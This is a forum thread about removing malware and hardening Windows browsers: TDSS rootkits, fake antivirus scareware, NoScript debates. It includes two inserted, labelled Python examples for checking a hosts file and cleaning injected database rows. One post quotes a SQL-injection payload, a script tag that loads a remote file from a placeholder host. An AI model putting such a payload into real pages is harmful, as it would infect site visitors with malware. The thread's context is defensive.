  • Locked thread
Wheany
Mar 17, 2006

Spinyahahahahahahahahahahahaha!

Doctor Rope

JustFrakkingDoIt posted:

And on the same subject, anybody more knowledgeable know of reasons not to use Secunia PSI? I'm really liking it so far.

Personally, I don't really care enough that I'm running an outdated version of some software to be notified of it in real time. And it was another thing that churned my hard drive in the background. So I uninstalled it from my computer.

Hipster_Doofus
Dec 20, 2003

Lovin' every minute of it.
I tried it for the hell of it and all it showed me was that I'm very good at keeping things updated on my own. :smug:

Wheany
Mar 17, 2006

Spinyahahahahahahahahahahahaha!

Doctor Rope

Hipster_Doofus posted:

I tried it for the hell of it and all it showed me was that I'm very good at keeping things updated on my own. :smug:

The first time I ran it, it found some legit outdated software and I updated them. It also found a lot of outdated poo poo from D:\Old poo poo from old computer\Program files\whothefuck\evencares.exe, which I deleted to get a higher percentage.

After that I was mostly *I install some new software* *Secunia pops up a balloon "Software changes detected"*

Thanks for telling me I installed something.

Pilsner
Nov 23, 2002

My laptop just got hit with a drive-by virus just as I was casually browsing on it yesterday. I wasn't browsing any suspicious sites when it happened.

Suddenly, a pop-up balloon appeared in the system tray, warning me about an infection in some file. A fake icon looking just like the Windows Action Center appeared, but I couldn't click it. It came up with a fake virus scanner, and some more fake pop-ups. I opened the task manager, and saw a suspicious process with a garbled name. When I tried to end it, focus was taken away from the task manager. After about 30 seconds more, I could see the hard drive working a lot, and a bit later, the screen went dark. That's when I just shut it off forcibly. I rebooted in safe mode, ran HiJackThis, and found the executable, plus I installed and ran the MS Security Essentials, which found Trojan:DOS/Shetwirl.M. It removed it, but I took no chances and just nuked the whole laptop and installed a fresh Windows 7 SP1.

I used Firefox on the laptop, but I think (can't remember) I had noscript off, and didn't have FlashBlock, plus the flash player and Windows Updates were probably half a year to a year out of date, since I rarely use the laptop.

Lesson learned, use the full browser protection package, update frequently, and keep MS Security Essentials installed. I was just being a slacker because it was just a laptop with nothing important, but you never know.

von Braun
Oct 30, 2009


Broder Daniel Forever
A month back I got a Trojan called something along the lines of "Trojan.Rootkit.Hijack32" or something like that. When I first got it I was just browsing some site I have gone to for a few years without having a problem but suddenly I saw the Java screen pop-up and a few seconds later I got a Blue Screen and the PC re-booted.

I spent a few hours reading up on how to remove this bastard, following long guides on some forum where the support guy just wanted Log files or whatever. I decided to check this thread instead and found TDSSKiller which removed the Trojan immediately.
But today, one of my hard drives (I have one 1TB and one 120GB Intel X-25 SSD) disappeared from "My Computer" and fixed it with a re-boot. After the re-boot my Windows just froze, the browser, Twitter client, everything except for the cursor. Before I knew it, I got a Blue Screen and an automatic re-boot and was then met with a "Hardware or software has been changed" message with a status code 0xc00000e and it refused to boot and I think I will try to re-install Windows 7 tomorrow.

The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this?

Maniaman
Mar 3, 2006

von Braun posted:

The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this?

Unless there is some new technology that allows viruses to embed themselves in the hardware, there's no virus that can survive a format/reinstall... unless it is somehow embedded in the MBR and it doesn't get wiped. In that case, just overwrite the entire drive with 0's.

Factory Factory
Mar 19, 2010

This is what Arcane Velocity was like.
The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway.

PopeOnARope
Jul 23, 2007

Hey! Quit touching my junk!

von Braun posted:

A month back I got a Trojan called something along the lines of "Trojan.Rootkit.Hijack32" or something like that. When I first got it I was just browsing some site I have gone to for a few years without having a problem but suddenly I saw the Java screen pop-up and a few seconds later I got a Blue Screen and the PC re-booted.

I spent a few hours reading up on how to remove this bastard, following long guides on some forum where the support guy just wanted Log files or whatever. I decided to check this thread instead and found TDSSKiller which removed the Trojan immediately.
But today, one of my hard drives (I have one 1TB and one 120GB Intel X-25 SSD) disappeared from "My Computer" and fixed it with a re-boot. After the re-boot my Windows just froze, the browser, Twitter client, everything except for the cursor. Before I knew it, I got a Blue Screen and an automatic re-boot and was then met with a "Hardware or software has been changed" message with a status code 0xc00000e and it refused to boot and I think I will try to re-install Windows 7 tomorrow.

The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this?

TDSS can be a real pain in the balls - and it'll usually gently caress you over if you don't remove it before doing anything. It'll also make OEM images fail.

In your case, I don't really think the two are related. You didn't give us much information. Are both drives connected to the same controller? Have you tried changing ports? Did you try a different controller? What about Last Known Good Config, Safe Mode, or the Recovery Console? Your best plan of attack here is to get back into windows somehow, and run TDSSKiller from there.

For all we know though, it could be any one of a wide range of issues cropping up.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Factory Factory posted:

The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway.

Infected MBR was a common feature with a ton of viruses throughout the 90s and early 2000s.

A Real Happy Camper
Dec 11, 2007

These children have taught me how to believe.
Had a friend get hit with System Tool today, after a little google and some scanning I managed to come out of it one bottle of booze richer. :toot:

He found it hilarious that my first reaction to seeing his computer was "oh yeah, I've seen this before!"

von Braun
Oct 30, 2009


Broder Daniel Forever

PopeOnARope posted:

In your case, I don't really think the two are related. You didn't give us much information. Are both drives connected to the same controller? Have you tried changing ports? Did you try a different controller? What about Last Known Good Config, Safe Mode, or the Recovery Console? Your best plan of attack here is to get back into windows somehow, and run TDSSKiller from there.

For all we know though, it could be any one of a wide range of issues cropping up.

I have tried changing ports on the motherboard and trying to boot it with only the system disk (the SSD) connected and then it tells me to insert a "Boot Media in selected Boot Device". And for the Last Good Config and Safe Mode I can't really get that far into the boot process.

Unless I can make something happen I will attempt a re-format later today.

sfwarlock
Aug 11, 2007

von Braun posted:

I have tried changing ports on the motherboard and trying to boot it with only the system disk (the SSD) connected and then it tells me to insert a "Boot Media in selected Boot Device". And for the Last Good Config and Safe Mode I can't really get that far into the boot process.

Unless I can make something happen I will attempt a re-format later today.

Get your hands on a boot CD (linux live cd, or a version of Hiren's with Mini XP, hilariously illegal as that is) and take a look at the drives.

von Braun
Oct 30, 2009


Broder Daniel Forever
I decided to just re-format my PC and everything is working fine. I have a license of NOD, is there anything else I should have to prevent this poo poo from happening again other than not visit suspicious sites?

Thanks for your help!

PopeOnARope
Jul 23, 2007

Hey! Quit touching my junk!

von Braun posted:

I decided to just re-format my PC and everything is working fine. I have a license of NOD, is there anything else I should have to prevent this poo poo from happening again other than not visit suspicious sites?

Thanks for your help!

(this needs to be in the OP in gigantic red font)

Update Flash, Update Java. Firefox + NoScript. Take regular backups - image backups even so you can just roll back at a moment's notice. If all else fails, try a pact with Satan.

Megiddo
Apr 27, 2004

Unicorns bite, but their bites feel GOOD.

PopeOnARope posted:

(this needs to be in the OP in gigantic red font)

Update Flash, Update Java. Firefox + NoScript. Take regular backups - image backups even so you can just roll back at a moment's notice. If all else fails, try a pact with Satan.
There's really a lot more to it than that, if you want to keep your machine secure:

Use Firefox or Chrome with NoScript and Adblock Plus and disable/uninstall any unneeded plugins. Make sure your browser is kept up to date with automatic updates. Check Mozilla's plugin check regularly to see if you have vulnerable plugins. Make sure you are receiving Microsoft updates for all Microsoft software (not just Windows), and keep all third-party software up-to-date that interacts with downloaded material of any kind, whether it has a plugin for a browser or not.

Only install Java when you actually need it and uninstall it promptly when finished. If you need to have Java installed all the time due to Java-dependent software, keep it updated at all times and disable Java plug-ins/add-ons in all your browsers. Keep in mind that Oracle rarely issues "out-of-band" critical updates/patches for Java, leaving security and bug fixes for the next quarterly release - and leaving you vulnerable until Oracle's next scheduled release. Unless you don't have it installed in the first place, of course.

Keep Adobe Acrobat, Adobe Reader, or any third-party PDF viewers up-to-date and ideally disable their plug-in/add-on. Make sure Acrobat/Reader security settings are set for maximum security: delete the Flash authplay.dll that's bundled with Acrobat/Reader, disable javascript, disallow multimedia operations, enable enhanced security, disallow opening of non-PDF files.

Keep Adobe Flash and Adobe Shockwave updated. Make sure Flash is set to check for updates automatically. Do not install Shockwave unless you actually need it as many people neglect to check for Shockwave updates and Adobe does not have an option to automatically check for Shockwave updates.

Keep Apple Quicktime updated, or either disable the plug-in/add-on on all browsers or just don't install Quicktime. If you use VLC, Winamp, or some other media player, make sure that it is updated as they have been known to have critical vulnerabilities with some types of files.

Any other programs that interact with downloaded files should be kept updated. For example, if you use uTorrent, even without a browser plug-in, you are still opening downloaded .torrent files that could exploit older versions of uTorrent with critical vulnerabilities.

If you're in a locked-down corporate, university, or public machine where you cannot update plugins, browsers, uninstall Java, etc. - use a USB flash drive with Portable Apps configured for secure and private browsing.

But good luck getting even experienced computer enthusiasts or professionals to do the above, let alone the casual user.

Megiddo fucked around with this message at 00:53 on Mar 21, 2011

hackedaccount
Sep 28, 2009
Good summary. The only other things you might want to mention are that people use MSE, FlashBlock, and what exactly the various removal programs do.

Looks like this thread is about 3 years old, you might want to start a new one.

BillWh0re
Aug 6, 2001


I find NoScript to be more trouble than it's worth to be honest. Using AdBlock and a browser that blocks known malicious sites (Firefox and IE both do, I assume Chrome does too) is less intrusive and still quite effective.

Megiddo
Apr 27, 2004

Unicorns bite, but their bites feel GOOD.

BillWh0re posted:

I find NoScript to be more trouble than it's worth to be honest. Using AdBlock and a browser that blocks known malicious sites (Firefox and IE both do, I assume Chrome does too) is less intrusive and still quite effective.
The problem with just using AdBlock and/or FlashBlock is that they don't block the execution of scripts or prevent content from downloading - in many, if not most, cases they just block it from displaying in the browser by merely hiding the ad content. Unless you block the scripts from running in the first place with something like NoScript, you're still open to attack from malicious scripts.

BillWh0re
Aug 6, 2001


Megiddo posted:

The problem with just using AdBlock and/or FlashBlock is that they don't block the execution of scripts or prevent content from downloading - in many, if not most, cases they just block it from displaying in the browser by merely hiding the ad content. Unless you block the scripts from running in the first place with something like NoScript, you're still open to attack from malicious scripts.

AdBlock Plus for Firefox does stop content from being downloaded. I'm not sure about other browsers (I think the Chrome one was recently updated to do this). You can probably test by killing Flash, opening a new browser window and browsing a site with a single blocked Flash ad, then seeing if Flash has been loaded.

The problem I have with NoScript is really that it's so fiddly and most users won't know which sites to allow, because there are a whole lot of legitimate uses for cross-domain javascript loading these days. Also, in cases where the malicious JS is embedded in the compromised page itself, it's not so useful since you probably already whitelisted the page.

If you know in advance that you're going to be visiting some compromised or malicious sites then NoScript is great, but for regular browsing it's overkill by far and steps over the line from "good enough security" to "interfering with productivity".

RCK-101
Feb 19, 2008

If a recruiter asks you to become a nuclear sailor.. you say no
Sup goons, my kid brother's laptop just got Antivirus 2011 (jesus christ), and I wanted to know, what is the best way of removing/purging this horrible being from beyond space and time?

Ghost Mutt
May 10, 2009

Ryand-Smith posted:

Sup goons, my kid brother's laptop just got Antivirus 2011 (jesus christ), and I wanted to know, what is the best way of removing/purging this horrible being from beyond space and time?

From memory I think it's just a couple of files located in C:\ProgramData\<randomlettersnumbers>\<randomlettersnumbers>.exe
Pretty sure that is just for Vista/7 though. Also boot in to Safe Mode first.

But the easiest way is to just run ComboFix or MalwareBytes. (or both!)

univbee
Jun 3, 2004




beastathon posted:

From memory I think it's just a couple of files located in C:\ProgramData\<randomlettersnumbers>\<randomlettersnumbers>.exe
Pretty sure that is just for Vista/7 though. Also boot in to Safe Mode first.

But the easiest way is to just run ComboFix or MalwareBytes. (or both!)

On XP it's often located in C:\Documents and Settings\All Users\[random]\[random].exe ; hell, sometimes it will even create a desktop shortcut that gives away the location if you check its properties!

Scaramouche
Mar 26, 2001

SPACE FACE! SPACE FACE!

Yeah it's pretty easy to remove, you can usually do it just by checking the hijack this settings. One thing to watch out for (though perhaps less likely for scareware) is if it phones home before you caught it, it might download something else through the same exploit/another exploit it makes itself. Normally I'd say this stuff rarely exists in isolation, but I'm actually finding that the attendant 'ecosystem' that accompanies scareware is a bit less diverse now. I'm not sure if it's because they don't want to mess up the computer before they get a payment, or if the infectors are starting to specialize in terms of their payloads.

m2pt5
May 18, 2005

THAT GOD DAMN MOSQUITO JUST KEEPS COMING BACK

Scaramouche posted:

Normally I'd say this stuff rarely exists in isolation, but I'm actually finding that the attendant 'ecosystem' that accompanies scareware is a bit less diverse now. I'm not sure if it's because they don't want to mess up the computer before they get a payment, or if the infectors are starting to specialize in terms of their payloads.

It could also be that people are catching older viruses or scareware that is trying to connect to servers that have already been taken down.

BangersInMyKnickers
Nov 3, 2004

I have a thing for courageous dongles

Has anyone tried changing the registry permissions on the group policy keys so the user and system can't write to them? I have a guy who keeps stumbling in to viruses that set them to do things like lock his desktop to some warning message and whatnot. My hope is that the majority of these viruses are too dumb to actually modify permissions before they write there, and the policy keys are more headache than they are worth on XP Home. Hopefully it doesn't break anything.

Scaramouche
Mar 26, 2001

SPACE FACE! SPACE FACE!

BangersInMyKnickers posted:

Has anyone tried changing the registry permissions on the group policy keys so the user and system can't write to them? I have a guy who keeps stumbling in to viruses that set them to do things like lock his desktop to some warning message and whatnot. My hope is that the majority of these viruses are too dumb to actually modify permissions before they write there, and the policy keys are more headache than they are worth on XP Home. Hopefully it doesn't break anything.

I've never been a fan of doing it manually, instead preferring solutions like Deep Freeze et al.

Factory Factory
Mar 19, 2010

This is what Arcane Velocity was like.
DEP just killed Chrome's Flash on me, throwing an error about illegal execution with a very long Chinese-character window title, but I can't tell what ad is throwing it. The only ads-displaying site I have going is SA, but the dialog is modal and I'm only using one window so I can't scroll around without dealing with it.

Anyone know what this is? Maybe the bad ad referenced in the QCS sticky?

Diet Crack
Jan 15, 2001

I just picked up the 2011 Security Virus as well. Mine is named "XP Home Security 2011" and it seems it has evolved into taking over in safe mode as well. At the moment I've rkilled it using a .com file (all .exe run another instance of 678.tmp, which is nowhere to be found on my hard drive after I deleted it) and am running MABM as I write this, and it has found 4, so hopefully I'm on the money.

This one is a bit of a bitch if you don't have another PC or OS to fall back on, because you need to kill the .tmp file from running over and over and disallowing you to run any .exe or anti virus programs.

If this all works out I'll post the link I followed.

Edit: Success.
http://www.bleepingcomputer.com/virus-removal/remove-win-7-internet-security-2011

The Temp and Reg files are all different though for me. Mine was a set of 3 numbered .tmp files.

Diet Crack fucked around with this message at 19:02 on Mar 23, 2011

sfwarlock
Aug 11, 2007

Diet Crack posted:

I just picked up the 2011 Security Virus as well. Mine is named "XP Home Security 2011" and it seems it has evolved into taking over in safe mode as well. At the moment I've rkilled it using a .com file (all .exe run another instance of 678.tmp, which is nowhere to be found on my hard drive after I deleted it) and am running MABM as I write this, and it has found 4, so hopefully I'm on the money.

This one is a bit of a bitch if you don't have another PC or OS to fall back on, because you need to kill the .tmp file from running over and over and disallowing you to run any .exe or anti virus programs.

If this all works out I'll post the link I followed.

Edit: Success.
http://www.bleepingcomputer.com/virus-removal/remove-win-7-internet-security-2011

The Temp and Reg files are all different though for me. Mine was a set of 3 numbered .tmp files.

I had to kill that this morning. Watch out for it unregistering your .exe associations.

sonicice
Oct 21, 2000

Michael J Beverage, I've got a bone to pick with you.
TDSS has been a real pain in the rear end for me lately. I've had TDSSKiller kill two computers after running it (although one I got back by restoring the registry backup from /windows/system32/config/regback), but I've had another machine where it has kept coming back over the past few months, even when I've pulled the hard drive out, hooked it to another machine and ran TDSSKiller and it removes it from there, deleted old restore points and all that poo poo. It will say it's gone, but then it's back again 3 weeks later. I don't loving know what the deal is.

Maniaman
Mar 3, 2006
It's either not gotten cleaned up all the way or it's a user/id 10 t error. I'm more willing to wager a user error.

PopeOnARope
Jul 23, 2007

Hey! Quit touching my junk!

Maniaman posted:

It's either not gotten cleaned up all the way or it's a user/id 10 t error. I'm more willing to wager a user error.

Or the DNS settings on the router it's connected to are hosed.

PUBLIC TOILET
Jun 13, 2009

The owner of the company I work for managed to contract computer AIDS this week. Internet Explorer kept crashing on his Windows Vista notebook. We upgrade the browser, works briefly then starts crashing again. This throws a red flag for me. I fire up Malwarebytes and start a scan. In the background, I swap network connections and magically Internet Explorer starts working fine again. For the hell of it I go through the hosts file. Page after page of various anti-virus, anti-malware, etc. sites being blocked. :ughh: Try to fire up the Kaspersky rescue disk and it's constantly failing database updates saying the database is corrupted every time.

Wipe MBR, wipe drive, reinstall.
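
An added example, not part of the post above: a Python check for the symptom it describes, a hosts file with entries that block or redirect anti-virus and update sites. The watchlist keywords and the sample hosts text are constructed for illustration.

```python
import ipaddress

# Constructed watchlist (an assumption of this example): substrings of
# security-vendor and update hostnames that should never need a hosts entry.
WATCHLIST = ("kaspersky", "malwarebytes", "symantec", "mcafee", "avast",
             "microsoft.com", "windowsupdate")

# Constructed sample; on Windows the real file is
# C:\Windows\System32\drivers\etc\hosts
SAMPLE_HOSTS = """\
# Constructed sample hosts file
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.kaspersky.com kaspersky.com
0.0.0.0         www.malwarebytes.org
203.0.113.9     update.microsoft.com   # points at a third-party address
192.168.1.20    nas.home.lan
"""


def parse_hosts(text):
    """Yield (line_number, ip, hostname) for every mapping in hosts-file text."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                          # not an address: skip the line
        for host in fields[1:]:               # one line may map several names
            yield lineno, ip, host.lower().rstrip(".")


def suspicious_entries(text, watchlist=WATCHLIST):
    """Return (line, kind, hostname) for mappings that touch watched names.

    kind is "blocked" when the name is sent to a loopback or unspecified
    address, and "redirected" when it is sent anywhere else.
    """
    findings = []
    for lineno, ip, host in parse_hosts(text):
        if any(word in host for word in watchlist):
            blocked = ip.is_loopback or ip.is_unspecified
            findings.append((lineno, "blocked" if blocked else "redirected", host))
    return findings


if __name__ == "__main__":
    for lineno, kind, host in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {lineno}: {host} is {kind}")
```
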

crestfallen
Aug 2, 2009

Hi.
Read the last few pages on a whim and drat, I learned about a lot of new tools.

I subscribe to the "don't be an idiot" philosophy and that has done a lot to keep me safe. And Adblock on most sites, plus script blocking extensions. And generally keeping software, etc. patched up.

Previously I was using avast! but it sounds like there are better options out there now. I installed MSE based on a ton of good praise and man, I like it a lot.

Question: a lot of you mention using multiple tools, which makes sense. However, when using something like MSE, would you also use things like MalwareBytes and SAS? Or do you primarily stick with one main antivirus/monitoring program and maybe fire up SAS once every couple weeks or something?

Just curious. I know all these things have gotten much more complex in recent years so I just want to avoid any weird conflicts between programs and so on.

feld
Feb 11, 2008

Out of nowhere its.....

Feldman

Customer of ours had pretty much every column of every table of their MSSQL database injected with <script src="http://foo.com/su.php" </script>

They said customers were complaining about getting trojans after visiting the site; each pageload was like 60 requests to that file. No idea what it did because by the time it was reported to us the file was gone from the server.


:smith:

Seat Safety Switch
May 27, 2008

MY RELIGION IS THE SMALL BLOCK V8 AND COMMANDMENTS ONE THROUGH TEN ARE NEVER LIFT.

Pillbug

feld posted:

Customer of ours had pretty much every column of every table of their MSSQL database injected with <script src="http://foo.com/su.php" </script>

They said customers were complaining about getting trojans after visiting the site; each pageload was like 60 requests to that file. No idea what it did because by the time it was reported to us the file was gone from the server.


:smith:
Something like this happened to me at another job, except they did an embedded reference to a javascript file (which probably loaded an exploit or at least did an XSS attack of some kind). It was pretty clumsy though, which made me think that whoever did it didn't really know what they were doing. A lot of the data was sanitized for output, obviously, so it never became raw HTML but instead cluttered up the page with HTML.

That was when I found out that they didn't have a backup or transaction log for their production SQL database, so I got to look up the "attacker" query in the IIS logs, decode it and then reverse it after closing the hole that let them do a SQL injection in the first place. That was a fun week, and a really fun way to learn about cursors.

Some data got lost if the embed string + existing data in the column in the row was too long, too, so "Foobarblahblahblah" would become "FoobarblEXPLOITEXPLOIT" and of course that couldn't be reversed. I think they put some random data entry person on trying to rebuild that stuff. :smithicide:

Seat Safety Switch fucked around with this message at 05:45 on Mar 30, 2011
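
An added example, not part of the post above: a Python sketch of the cleanup it describes, stripping an appended script tag from column values and flagging the rows where the column was filled to its width, so the original text may have been cut and cannot be restored automatically. It assumes the payload is known from the logs (here a constructed placeholder), that it was appended to the end of each value, and that each column's declared width is known.

```python
# Constructed placeholder for the injected string recovered from the logs.
PAYLOAD = '<script src="http://injected.example/x.js"></script>'
MIN_FRAGMENT = 8  # shortest payload prefix treated as a cut-off copy ("<script ")


def strip_injection(value, payload, width):
    """Return (status, text) for one column value.

    status is "clean" (no payload found), "restored" (payload removed and the
    column had room to spare, so the original is intact) or "needs_review"
    (payload removed, but the value filled the column, so part of the
    original may have been lost to truncation).
    """
    filled = len(value) >= width
    text, hit = value, False
    # A copy of the payload cut short by the column width can only sit at the
    # very end of a value that fills the column.
    if filled and not text.endswith(payload):
        for n in range(len(payload) - 1, MIN_FRAGMENT - 1, -1):
            if text.endswith(payload[:n]):
                text, hit = text[:-n], True
                break
    # Remove every complete copy, in case the injection ran more than once.
    while text.endswith(payload):
        text, hit = text[:-len(payload)], True
    if not hit:
        return "clean", value
    return ("needs_review" if filled else "restored"), text


def repair_rows(rows, payload, width):
    """rows: iterable of (row_id, value). Returns {row_id: (status, text)}."""
    return {row_id: strip_injection(value, payload, width)
            for row_id, value in rows}


# Constructed sample rows for a 60-character column.
WIDTH = 60
SAMPLE_ROWS = [
    (1, "Foobar" + PAYLOAD),                          # fits: fully recoverable
    (2, "Plain value"),                               # never touched
    (3, "Foobarbl" + PAYLOAD),                        # exactly fills the column
    (4, ("A product description" + PAYLOAD)[:WIDTH]),  # payload itself cut off
]

if __name__ == "__main__":
    for row_id, (status, text) in repair_rows(SAMPLE_ROWS, PAYLOAD, WIDTH).items():
        print(row_id, status, repr(text))
```

Rows reported as "needs_review" are the ones the post says had to be rebuilt by hand; the stripped text is only what survived in the column.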

The Reaganomicon
Oct 14, 2010

by Lowtax

Seat Safety Switch posted:

Something like this happened to me at another job, except they did an embedded reference to a javascript file (which probably loaded an exploit or at least did an XSS attack of some kind). It was pretty clumsy though, which made me think that whoever did it didn't really know what they were doing. A lot of the data was sanitized for output, obviously, so it never became raw HTML but instead cluttered up the page with HTML.

That was when I found out that they didn't have a backup or transaction log for their production SQL database, so I got to look up the "attacker" query in the IIS logs, decode it and then reverse it after closing the hole that let them do a SQL injection in the first place. That was a fun week, and a really fun way to learn about cursors.

Some data got lost if the embed string + existing data in the column in the row was too long, too, so "Foobarblahblahblah" would become "FoobarblEXPLOITEXPLOIT" and of course that couldn't be reversed. I think they put some random data entry person on trying to rebuild that stuff. :smithicide:

Should've told them it was beyond salvation and rammed the point home re: backups.

CraigK
Nov 4, 2008

by exmarx
personal info deleted

CraigK fucked around with this message at 01:28 on Mar 8, 2012

Prosthetic_Mind
Mar 1, 2007
Pillbug
At a glance, if Craig3410@gmail.com is your email address, either someone hacked your email or is spoofing your email address.

If it's the former, one of the computers you have used to check your email is/was probably rooted and someone stole your password, or they could just be spoofing your email address, it's trivially easy. I'd suggest changing your password and running something like RootkitRevealer on all the machines you check your mail on (assuming a 32 bit version of windows), and working from there. If someone is spoofing your email address, there isn't a whole lot you can do other than move to a new one.

Prosthetic_Mind fucked around with this message at 20:59 on Mar 30, 2011

CraigK
Nov 4, 2008

by exmarx

Prosthetic_Mind posted:

At a glance, if Craig3410@gmail.com is your email address, either someone hacked your email or is spoofing your email address.

If it's the former, one of the computers you have used to check your email is/was probably rooted and someone stole your password, or they could just be spoofing your email address, it's trivially easy. I'd suggest changing your password and running something like RootkitRevealer on all the machines you check your mail on (assuming a 32 bit version of windows), and working from there. If someone is spoofing your email address, there isn't a whole lot you can do other than move to a new one.

Yeah, it's mine.

I'm going to make a new account as soon as I can access my Google Docs, get my stuff, and close it.
